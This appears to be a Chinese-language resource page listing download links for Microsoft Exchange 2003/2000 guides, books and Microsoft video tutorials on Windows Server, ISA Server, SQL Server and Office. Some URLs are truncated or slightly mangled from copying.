http://www.5dmail.net/down/list.asp?id=646
http://www.microsoft.com/downloa ... 3-B037-C04A96A977FD
-------------------------
规划和部署
规划Exchange 2003邮件系统
http://www.5dmail.net/down/list.asp?id=649
http://www.microsoft.com/downloa ... 7-BB71-908B8F2B980D
Exchange Server 2003 高可用性指南(新)
http://www.5dmail.net/down/list.asp?id=837
http://www.microsoft.com/downloa ... 6-be2e-9b6f2164c54a
Exchange Server 2003 客户端访问指南
http://www.5dmail.net/down/list.asp?id=730
http://www.microsoft.com/downloa ... p;displaylang=zh-cn
------------------------------
部署
Exchange 2003 部署指南
http://www.5dmail.net/down/list.asp?id=648
http://www.microsoft.com/downloa ... 1-8FBB-FE6339FFA1ED
Exchange Server 2003 RPC over HTTP 部署方案
http://www.5dmail.net/down/list.asp?id=940
Exchange Server 2003 客户端访问指南
http://www.5dmail.net/down/list.asp?id=730
http://www.microsoft.com/downloa ... p;displaylang=zh-cn
-------------------------
管理
Exchange Server 2003 管理指南
http://www.5dmail.net/down/list.asp?id=674
http://www.microsoft.com/downloa ... 9-97D6-50D8AEEBD8A1
Exchange Server 2003 传输和路由指南
http://www.5dmail.net/down/list.asp?id=731
http://www.microsoft.com/downloa ... p;displaylang=zh-cn
动接受代理的部署和管理指南
http://www.5dmail.net/down/list.asp?id=941
优化 Exchange Server2003 的存储(NEW)
http://www.5dmail.net/down/list.asp?id=939
http://www.microsoft.com/downloa ... p;DisplayLang=zh-cn
处理 Microsoft Exchange 2003 的 Active Directory 权限问题
http://www.5dmail.net/down/list.asp?id=943
------------------------------
灾难恢复
Exchange Server 2003 灾难恢复*作指南 (新)
hthttp://www.5dmail.net/down/list.asp?id=836
http://www.microsoft.com/downloa ... f-aede-007a8f366b0e
Exchange Server 2003 高可用性指南(新)
http://www.5dmail.net/down/list.asp?id=837
http://www.microsoft.com/downloa ... 6-be2e-9b6f2164c54a
-------------------------------
迁移和升级
规划Exchange 2003邮件系统
http://www.5dmail.net/down/list.asp?id=649
http://www.microsoft.com/downloa ... 7-BB71-908B8F2B980D
Exchange 2003 部署指南
http://www.5dmail.net/down/list.asp?id=648
http://www.microsoft.com/downloa ... 1-8FBB-FE6339FFA1ED
-------------------------
安全和保护
在 Exchange 2003 环境中抑制和阻止通过电子邮件传输的病毒(New)
http://www.5dmail.net/down/list.asp?id=838
http://www.microsoft.com/downloa ... d-92a5-8f8cf4bf9fdb
Exchange Server 2003 邮件安全指南
http://www.5dmail.net/down/list.asp?id=733
http://www.microsoft.com/downloa ... p;displaylang=zh-cn
智能邮件筛选器部署指南
http://www.5dmail.net/down/list.asp?id=732
http://www.microsoft.com/downloa ... B-9208-6F75707870C2
Exchange Server 2003 安全强化指南
hthttp://www.5dmail.net/down/list.asp?id=734
http://www.microsoft.com/downloa ... F-9A44-504DB09B9065
处理 Microsoft Exchange 2003 的 Active Directory 权限问题
http://www.5dmail.net/down/list.asp?id=943
--------------------------------------------------------------------------------------
技术指南
Exchange Server 2003 技术参考指南(NEW)
http://www.5dmail.net/down/list.asp?id=942
http://www.microsoft.com/downloa ... p;DisplayLang=zh-cn
-----------------------------------------------------------------------------------
二、Exchange 2003/2000 书籍教程下载
Exchange Server 管理员手册(推荐)
http://www.5dmail.net/down/list.asp?id=856
Exchange 2000 Server规划安装(NEW)
http://www.5dmail.net/down/list.asp?id=923
Exchange 2000 Server 升级部署教程(NEW)
http://www.5dmail.net/down/list.asp?id=927
Exchange 2000 Server 实验手册(NEW)
http://www.5dmail.net/down/list.asp?id=926
Exchange 2000 Sever *作手冊(NEW)
http://www.5dmail.net/down/list.asp?id=925
Exchange 会议服务器安装图解(NEW)
http://www.5dmail.net/down/list.asp?id=924
Exchange 2000 Server安装实录
http://www.5dmail.net/down/list.asp?id=853
Exchange 2000 Server灾害重建
http://www.5dmail.net/down/list.asp?id=859
Exchange 2000安装中文图解
http://www.5dmail.net/down/list.asp?id=688
Exchange 2000 Server安装全攻略
http://www.5dmail.net/down/list.asp?id=835
Exchange 灾难恢复视频教程
http://www.5dmail.net/down/list.asp?id=725
Exchange 2000 Server 使用指南
http://www.5dmail.net/down/list.asp?id=712
Exchange 2000 Server实用全书(PDG)
http://www.5dmail.net/down/list.asp?id=672
SQL和Exchange群集系统安装配置
http://www.5dmail.net/down/list.asp?id=715
Exchange 2000 and 2003 相关文章和白皮书下载(总共68M)
http://download.microsoft.com/do ... geAllTechPapers.exe
--------------------------------------------------------------------
三、Exchange 相关网站及技术资源
Exchange Server 2003 支持中心*
http://support.microsoft.com/default.aspx?scid=fh;ZH-CN;exch2003
Exchange 2000 Server 支持中心*
http://support.microsoft.com/default.aspx?scid=FH;ZH-CN;exch2k
Exchange 2003 技术文档库
http://www.microsoft.com/china/t ... ibrary/default.mspx
Exchange Server How-To 文章
http://www.microsoft.com/china/t ... /howto/exchhow.mspx
http://www.kbalertz.com
日志查询
http://www.microsoft.com/technet/support/eventserrors.mspx
日志查询
http://www.eventid.net/
EXCHANGE技术中心
http://www.microsoft.com/china/t ... change/default.mspx
EXCHANGE 2003资源下载
http://www.microsoft.com/china/exchange/downloads/2003.asp
EXCHANGE安全中心(包括所有与安全有关的指南、模块和checklist)
http://www.microsoft.com/china/t ... ExchangeServer.mspx
Exchange Blog(英文)
http://blogs.msdn.com/exchange/
msexchange(英文)
http://www.msexchange.org
Outlook Exchange(EN)
http://www.outlookexchange.com/
Exchange D2D(EN)
http://www.exchanged2d.com/
Exchange Blog UK(英文)
http://www.msexchange.co.uk/
slipstick(EN)
http://www.slipstick.com/
searchexchange(EN)
http://searchexchange.techtarget.com/
来自微软的教程(5)
微软专题教程---使用ISA2004部署服务器发布
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-23a-b949-e63fc2ec83ee/msft022505vx.zip
微软专题教程---使用ISA2004部署企业远程访问与VPN架构
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022405vx.zip
微软专题教程 理解ISA 2004中的网络规则
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022305vx.zip
微软专题教程 ISA 2004经典部署与应用
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022205vx.zip
微软专题教程 ISA Server 2004技术预览与特性演示
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022105vx.zip
微软专题教程 微软2月安全公告讲座
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft021105vx.zip
微软专题教程 组策略技巧与实践
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020405vx.zip
微软专题教程 MDX:微软商业智能平台的精髓
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020305vxpm.zip
微软专题教程---Microsoft Virtual Server 2005技术概览
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft013105vx.zip
微软专题教程---使用GPMC随心所欲管理组策略
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft012805vxpm.zip
微软专题教程---Windows 管理大全之启动排错全接触
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft012805vxam.zip
微软专题教程---微软Exchange最佳实践分析工具
http://download.microsoft.com/download/5/9/2/59241a6c-2ddd-4b64-a576-89369342d069/msft012705vx.zip
微软专题教程---理解 Exchange 服务器与活动目录与的整合
http://download.microsoft.com/download/5/9/2/59241a6c-2ddd-4b64-a576-89369342d069/msft012605vxpm.zip
微软专题教程---Windows 2003 服务应用大全之 IIS6.0 使用详解
http://download.microsoft.com/download/9/c/f/9cf8fbee-c702-46e6-9832-80305c59be5b/msft011805vxam.zip
微软专题教程---探究Windows XP SP2 Firewall——SOHO之部署
http://download.microsoft.com/download/¼;/1/141fe483-b3f5-4014-a44b-6db7fcfd090e/msft011405vx.zip
微软专题教程---使用ISA2004部署服务器发布
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022505vx.zip
微软专题教程---使用ISA2004部署企业远程访问与VPN架构
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022405vx.zip
微软专题教程 理解ISA 2004中的网络规则
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022305vx.zip
微软专题教程 ISA 2004经典部署与应用
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022205vx.zip
微软专题教程 ISA Server 2004技术预览与特性演示
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022105vx.zip
微软专题教程 微软2月安全公告讲座
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft021105vx.zip
微软专题教程 组策略技巧与实践
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020405vx.zip
微软专题教程 MDX:微软商业智能平台的精髓
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020305vxpm.zip
微软专题教程---Microsoft Virtual Server 2005技术概览
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft013105vx.zip
微软专题教程---微软Exchange最佳实践分析工具
http://download.microsoft.com/download/5/9/2/59241a6c-2ddd-4b64-a576-89369342d069/msft012705vx.zip
微软专题教程---理解 Exchange 服务器与活动目录与的整合
http://download.microsoft.com/download/5/9/2/59241a6c-2ddd-4b64-a576-89369342d069/msft012605vxpm.zip
微软专题教程---探究Windows XP SP2 Firewall——企业环境中的部署 [燕园精品软件整理]
http://download.microsoft.com/download/9/c/f/9cf8fbee-c702-46e6-9832-80305c59be5b/msft011805vxpm.zip
微软专题教程---SQL server 2005 安全性(概述)
http://download.microsoft.com/download/e/7/3/e737c9cd-9255-41d5-960a-890d0cc12d00/msft011205vx.zip
微软专题教程---SQL Server 2005 商务智能
http://download.microsoft.com/download/d/7/3/d731bd1b-978a-4607-b4a7-d61138bda506/msft010705vxpm.zip
微软专题教程---Windows Mobile 客户端程序开发精讲
http://download.microsoft.com/download/d/7/3/d731bd1b-978a-4607-b4a7-d61138bda506/msft010705vxam.zip
微软专题教程---Live Communication Server 2005 简介
http://download.microsoft.com/download/1/3/f/13fafba5-28b9-484c-ac43-96577b51ee6f/msft010505vx.zip
微软专题教程---在 .NET Framework 精简版中使用 Pocket Outlook 的功能 品软件整理]
http://download.microsoft.com/download/4/e/c/4ecee52f-efe1-4ee8-b0d7-639e72be5f6c/msft122804vx.zip
微软专题教程---Windows Mobile 和微软服务器产品的集成
http://download.microsoft.com/download/e/3/b/e3bd16a0-232d-44da-8e3e-6b23fd3fb2bf/msft120104vxam.zip
微软专题教程---使用 ADS 部署 Windows 服务器
http://download.microsoft.com/download/4/e/c/4ec7db52-91b3-452f-9821-af1ba9b7d1b2/msft122204vx.zip
微软专题教程---Microsoft Excel 2003 图表绘制技巧
http://download.microsoft.com/download/4/e/c/4ec7db52-91b3-452f-9821-af1ba9b7d1b2/msft122304vxam.zip
微软专题教程---改善系统操作,加强系统安全 - Windows NT 4.0 到2003安全及操作
http://download.microsoft.com/download/4/d/8/4d87ddc1-9899-4934-9560-96b0b107e957/msft122104vxpm.zip
微软专题教程---利用 Virtual PC 2004 搭建企业应用和测试平台
http://download.microsoft.com/download/9/d/6/9d61c7cf-53e7-4dc0-b998-11a2e721e392/msft122004vx.zip
微软专题教程---怎样制作内容丰富的幻灯片
http://download.microsoft.com/download/9/d/6/9d61c7cf-53e7-4dc0-b998-11a2e721e392/msft121704vx.zip
微软专题教程---Exchange 数据保护最佳实践
http://download.microsoft.com/download/d/a/c/dacf443a-2c4f-4b78-a6c1-f4db22e4e379/msft121604vx.zip
微软专题教程---使用 Microsoft Office 2003 与SharePoint 技术实现
http://download.microsoft.com/download/d/a/c/dacf443a-2c4f-4b78-a6c1-f4db22e4e379/msft121504vxam.zip
微软专题教程---构建基于 SQL CE 的移动方案
http://download.microsoft.com/download/d/a/c/dacf443a-2c4f-4b78-a6c1-f4db22e4e379/msft121504vxpm.zip
微软专题教程---确保 Windows 服务器的安全性
http://download.microsoft.com/download/2/4/6/2463f068-c830-4ecb-81ab-63385200318b/msft121404vx.zip
微软专题教程---Microsoft Office Excel 2003 实用技巧之一:在会计处理及财务管理之应用
http://download.microsoft.com/download/2/4/6/2463f068-c830-4ecb-81ab-63385200318b/msft121304vx.zip
来自微软的教程(4)
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042105vxpm.zip
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042205vxam.zip
Windows 证书服务部署安全基础框架
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042205vxpm.zip
微软企业级补丁管理解决方案——SMS篇
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042505vx.zip
实现SQL SERVER高度可用性-主动/被动群集和主动/主动群集
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042705vx.zip
数字证书在 OE/Outlook 中的应用
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042805vx.zip
使用组策略和IP Sec进行网络隔离(上)
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft052405vxpm.zip
Word点点通
http://download.microsoft.com/download/a/3/d/a3d36a9f-2858-4702-8467-40e856b996c1/msft051305vxam.zip
五月安全公告信息解读
http://download.microsoft.com/download/a/3/d/a3d36a9f-2858-4702-8467-40e856b996c1/msft061705vxam.zip
六月安全公告信息解读
http://download.microsoft.com/download/8/1/f/81ff7f79-3e2a-4df9-a3d2-439299c5e00d/msft123004vx.zip
Word长篇文档排版技巧
http://download.microsoft.com/download/5/6/3/563a1537-acbf-42e4-b57e-50bfdbe0b2c0/msft053005vxpm.zip
SQL Server 数据恢复实战
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft052605vxam.zip
评估网络安全 (上)
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft052005vxam.zip
.NET应用的配置和监测
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft052405vxam.zip
DBA 的免费午餐——Microsoft SQL Server Web Data Administrator
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft051905vxpm.zip
Exchange 2003安全全集(上)
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft052005vxpm.zip
Exchange 2003安全全集(下)
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft052705vxpm.zip
Windows Server 2003活动目录:管理特征
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft053005vxam.zip
如何应用MOF以提高系统的可靠性
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft052505vxpm.zip
Scripting With AD
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft052505vxam.zip
Exchange Server 2003 实战管理系列之三:管理Exchange组织和服务器
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft01905vxam.zip
如何加固Windows XP 主机安全
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051805vxam.zip
Exchange Server 2003 实战管理系列之二:Exchange部署与管理体系结构
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051705vxam.zip
借助Microsoft Virtual PC 2004搭建Active Directory Lab
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051605vxpm.zip
微软基准安全分析器在企业中的实施
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051605vxam.zip
PowerPoint新知
http://download.microsoft.com/download/d/4/1/d41128f3-4211-46c3-8994-647c566037d6/msft051205vxam.zip
使用组策略和IP Sec进行网络隔离(下)
http://download.microsoft.com/download/d/4/1/d41128f3-4211-46c3-8994-647c566037d6/msft051105vxam.zip
Exchange Server 2003 实战管理系列之一:Exchange Server 2003 规划与部署
来自微软的教程(3)
http://download.microsoft.com/download/8/d/b/8db0a368-8b0a-440d-bb17-a9d52373939b/msft032105vxpm.zip
Windows工具箱:活动目录与网络系列 (二)
http://download.microsoft.com/download/8/d/b/8db0a368-8b0a-440d-bb17-a9d52373939b/msft032205vx.zip
关于工作组环境中网络访问的疑难解答
http://download.microsoft.com/download/8/d/b/8db0a368-8b0a-440d-bb17-a9d52373939b/msft032305vxam.zip
将工作放进口袋里——让你的产品实现无缝计算
http://download.microsoft.com/download/2/d/c/2dc47537-325f-435f-aec3-cac6fdbfd5c2/msft032305vxpm.zip
利用Exchange Server 2003有效阻挡垃圾邮件
http://download.microsoft.com/download/2/d/c/2dc47537-325f-435f-aec3-cac6fdbfd5c2/msft032405vxam.zip
Windows Server 2003的DNS增强和新特性
http://download.microsoft.com/download/2/d/c/2dc47537-325f-435f-aec3-cac6fdbfd5c2/msft032405vxpm.zip
使用 ISA Server 2004 保护网络周边安全(上)
http://download.microsoft.com/download/4/0/2/4021c40c-351a-412e-9042-ddf23b32b9f2/msft032505vxam.zip
Outlook 2003信息管理
http://download.microsoft.com/download/4/0/2/4021c40c-351a-412e-9042-ddf23b32b9f2/msft032505vxpm.zip
挖掘保护 PC 的工具及技术
http://download.microsoft.com/download/e/6/3/e63a17bf-4773-403b-a4bc-e06d704c7f09/msft032805vxam.zip
使用 ISA Server 2004 保护网络周边安全(下)
http://download.microsoft.com/download/4/0/2/4021c40c-351a-412e-9042-ddf23b32b9f2/msft032805vx.zip
Windows 2003网络安全最佳实践之---使用IPSEC保证数据传输安全
http://download.microsoft.com/download/e/6/3/e63a17bf-4773-403b-a4bc-e06d704c7f09/msft032905vx.zip
IIS 6.0 新特性
http://download.microsoft.com/download/e/6/3/e63a17bf-4773-403b-a4bc-e06d704c7f09/msft033005vx.zip
用图表说话:Visio 2003概览与实例
http://download.microsoft.com/download/2/7/b/27be2b4a-3fcf-40fa-8309-80ed59f03d36/msft033105vxam.zip
标识和访问管理(上)
http://download.microsoft.com/download/2/7/b/27be2b4a-3fcf-40fa-8309-80ed59f03d36/msft033105vx.zip
Exchange Server 2003 移动计算
http://download.microsoft.com/download/3/e/4/3e4a6eaa-9e2e-42d8-8732-cdc817435473/msft040105vxam.zip
使用 SSL 确保 Web 服务器通信安全
http://download.microsoft.com/download/3/e/4/3e4a6eaa-9e2e-42d8-8732-cdc817435473/msft040105vxpm.zip
.NET应用的部署、管理和监测
http://download.microsoft.com/download/3/e/4/3e4a6eaa-9e2e-42d8-8732-cdc817435473/msft040405vx.zip
安装和配置MOM2005
http://download.microsoft.com/download/3/e/4/3e4a6eaa-9e2e-42d8-8732-cdc817435473/msft040505vxam.zip
Exchange Server 邮件存储系统之原理篇
http://download.microsoft.com/download/3/e/4/3e4a6eaa-9e2e-42d8-8732-cdc817435473/msft040505vxpm.zip
增强windows安全全集(下)
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft040605vxpm.zip
体验微软最新即时消息解决方案 LCS 2005 SP1 和 Office Communicator 2005
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft040705vx.zip
标识和访问管理(下)
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft040805vx.zip
SQL Server 2005 DTS 新特性展示之二-Data Flow
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft041105vxam.zip
利用Microsoft Office 2003电子化工作流程(一)
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft041105vxpm.zip
实现SQL Server高度可用性-复制程
http://download.microsoft.com/download/1/c/0/1c0049e6-3f27-4a83-a049-29a428b1b6d1/msft041205vxam.zip
利用Microsoft Office 2003电子化工作流程(二)
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041205vxpm.zip
Windows Server 2003从入门到精通系列之二:创建和管理用户帐户
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041305vxam.zip
移动企业服务的纽带——移动Web服务
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041405vxam.zip
Windows Mobile 游戏设计
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041405vxpm.zip
微软企业级补丁管理解决方案——WSUS篇
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041505vxam.zip
微软4月安全公告讲座
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft041505vxpm.zip
安全风险管理(上)
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft041805vxam.zip
Windows Mobile多媒体解决方案
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft041905vxam.zip
关于BSI7799信息安全管理体系
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft042005vxpm.zip
Microsoft InfoPath 表单设计与开发实战
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft042105vxam.zip
安全风险管理(下)
来自微软的教程(2)
http://download.microsoft.com/download/1/9/8/19896f2c-46a9-4bcd-81f9-60cd21b349fc/msft081804vx.zip
Active Directory 故障排除经验谈
http://download.microsoft.com/download/3/c/b/3cb83b18-cea7-41de-85b7-354aae6f431b/msft010605vx.zip
网络防火墙的杰出之作—ISA Server 2004
http://download.microsoft.com/download/1/9/8/19896f2c-46a9-4bcd-81f9-60cd21b349fc/msft082004vx.zip
ISA Server 2004 防火墙功能概述及客户端应用演示
http://download.microsoft.com/download/0/9/d/09d67749-46eb-4e05-85ac-17c1729811d8/msft102704vx.zip
利用 ISA Server 2004 实现具有高可靠性的网络安全
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft013105vx.zip
Microsoft Virtual Server 2005——技术概览
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022505vx.zip
使用ISA2004部署服务器发布
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022405vx.zip br /> 使用ISA2004部署企业远程访问与VPN架构
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022305vx.zip
理解ISA 2004中的网络规则
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022205vx.zip
ISA 2004经典部署与应用
http://download.microsoft.com/download/2/7/8/27849df7-ff16-44f9-8d5b-cfa8dc2594b4/msft022105vx.zip
ISA Server 2004技术预览与特性演示
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft021105vx.zip
微软2月安全公告讲座
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020405vx.zip
组策略技巧与实践
http://download.microsoft.com/download/9/a/1/9a134f79-c47e-4601-acd1-d65cfd593613/msft020305vxpm.zip
MDX:微软商业智能平台的精髓
http://download.microsoft.com/download/b/a/0/ba09719b-95d3-4f5a-ae58-6d74e5e87c3a/msft020305vxam.zip
Windows工具箱:活动目录与网络系列 (一)
http://download.microsoft.com/download/b/a/0/ba09719b-95d3-4f5a-ae58-6d74e5e87c3a/msft020205vx.zip
客户端安全与组策略
http://download.microsoft.com/download/b/a/0/ba09719b-95d3-4f5a-ae58-6d74e5e87c3a/msft020105vx.zip
Windows的灵活安装
http://download.microsoft.com/download/3/b/f/3bfb53b8-76b5-423a-b949-e63fc2ec83ee/msft022805vx.zip
MOF简介
http://download.microsoft.com/download/1/3/6/136ca9d0-817f-4505-bfb5-701628bce03e/msft030105vx.zip
ISA 2004-理解ISA 2004的应用层过滤器
http://download.microsoft.com/download/1/3/6/136ca9d0-817f-4505-bfb5-701628bce03e/msft030205vx.zip
MBSA + SUS——免费安全补丁管理解决方案
http://download.microsoft.com/download/1/3/6/136ca9d0-817f-4505-bfb5-701628bce03e/msft030305vx.zip
Windows 2003网络架构最佳实践-管理和维护DHCP
http://download.microsoft.com/download/b/0/d/b0d3a5b6-f397-474c-a962-998abcf67477/msft030405vx.zip
Windows远程终端方案概述
http://download.microsoft.com/download/b/0/d/b0d3a5b6-f397-474c-a962-998abcf67477/msft030705vx.zip
增强windows安全全集 (上)
http://download.microsoft.com/download/b/0/d/b0d3a5b6-f397-474c-a962-998abcf67477/msft030805vx.zip
基于x64架构的Windows概述
http://download.microsoft.com/download/3/e/6/3e670f38-bce9-4178-91b7-5a1ae094b374/msft030905vx.zip
Microsoft Virtual Server 2005——搭建双节点虚拟机群集
http://download.microsoft.com/download/3/e/6/3e670f38-bce9-4178-91b7-5a1ae094b374/msft031005vx.zip
间谍软件概述与应对
http://download.microsoft.com/download/3/e/6/3e670f38-bce9-4178-91b7-5a1ae094b374/msft031105vxam.zip
微软3月安全公告讲座
http://download.microsoft.com/download/e/6/6/e661b49c-d7db-4695-a611-7b381ded9653/msft031105vxpm.zip
浏览服务——网上邻居的幕后原理
http://download.microsoft.com/download/e/6/6/e661b49c-d7db-4695-a611-7b381ded9653/msft031405vx.zip
SMS 2003 实战
http://download.microsoft.com/download/e/6/6/e661b49c-d7db-4695-a611-7b381ded9653/msft031505vx.zip
Exchange Server 2003反垃圾邮件攻略
http://download.microsoft.com/download/c/3/7/c37ae4f1-6596-45f8-b4e1-b11fda62a360/msft031605vxam.zip
身份标识和访问控制(粤语课程 粤语讲解及英文幻灯片)
http://download.microsoft.com/download/c/3/7/c37ae4f1-6596-45f8-b4e1-b11fda62a360/msft031605vxpm.zip
“微软解决方案框架”内幕
http://download.microsoft.com/download/c/3/7/c37ae4f1-6596-45f8-b4e1-b11fda62a360/msft031705vx.zip
如何制作一份漂亮的数据报告
http://download.microsoft.com/download/a/3/e/a3ea387c-6fdf-4505-9ab7-ca72b014c9a6/msft031805vxam.zip
安全的Windows Mobile解决方案(上)(客户端)
http://download.microsoft.com/download/a/3/e/a3ea387c-6fdf-4505-9ab7-ca72b014c9a6/msft031805vxpm.zip
Windows 2003网络架构最佳实践-使用路由和远程访问配置路由
http://download.microsoft.com/download/a/3/e/a3ea387c-6fdf-4505-9ab7-ca72b014c9a6/msft032105vxam.zip
安全的Windows Mobile解决方案(下)(服务器)
来自微软的教程(1)
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041305vxpm.zip
Windows Server 2003从入门到精通系列之一:详细探讨Windows server 2003操作系统的安装方法
http://download.microsoft.com/download/a/e/7/ae788631-15e6-4f22-a923-ef1b663f2675/msft041205vxpm.zip
Windows Server 2003从入门到精通系列之二:创建和管理用户帐户
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft041805vxpm.zip
Windows Server 2003从入门到精通系列之三:NTFS特性在Windows 2003上的体现
http://download.microsoft.com/download/f/b/7/fb7f7608-a196-4aab-9d23-e3905c44cf95/msft042005vxam.zip
Windows Server 2003从入门到精通系列之四:网络共享资源的各种访问方法
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042605vx.zip
Windows Server 2003从入门到精通系列之五:Windows server 2003安全策略
http://download.microsoft.com/download/c/f/9/cf93bcd1-7d24-4c96-86b1-064a8955e7b5/msft042905vxpm.zip
Windows Server 2003从入门到精通系列之六:Windows server 2003中的磁盘管理
http://download.microsoft.com/download/d/4/1/d41128f3-4211-46c3-8994-647c566037d6/msft050905vxpm.zip
Windows Server 2003从入门到精通系列之七:Windows server 2003灾难恢复——备份
http://download.microsoft.com/download/d/4/1/d41128f3-4211-46c3-8994-647c566037d6/msft051005vxpm.zip
Windows Server 2003从入门到精通系列之八:使用IPSec加强系统安全性
http://download.microsoft.com/download/d/4/1/d41128f3-4211-46c3-8994-647c566037d6/msft051205vxpm.zip
Windows Server 2003从入门到精通系列之九:TCP/IP协议基础
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051305vxpm.zip
Windows Server 2003从入门到精通系列之十:Windows server 2003 服务应用大全之DNS服务使用详解
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051805vxpm.zip
Windows Server 2003从入门到精通系列之十一:Windows server 2003 服务应用大全之DHCP服务使用详解
http://download.microsoft.com/download/4/0/1/4015bd92-4308-479f-aa1e-b887b1778124/msft051705vxpm.zip
Windows Server 2003从入门到精通系列之十二:Windows server 2003 服务应用大全之WINS服务使用详解
http://download.microsoft.com/download/7/0/0/7008da40-ee02-48e1-b920-1a12bc2f5d6f/msft052305vxpm.zip
Windows Server 2003从入门到精通系列之十三:如何使用Windows server 2003搭建VPN服务器
http://download.microsoft.com/download/f/7/e/f7ecb34d-5c3a-4112-9175-7ed666653cdf/msft052605vxpm.zip
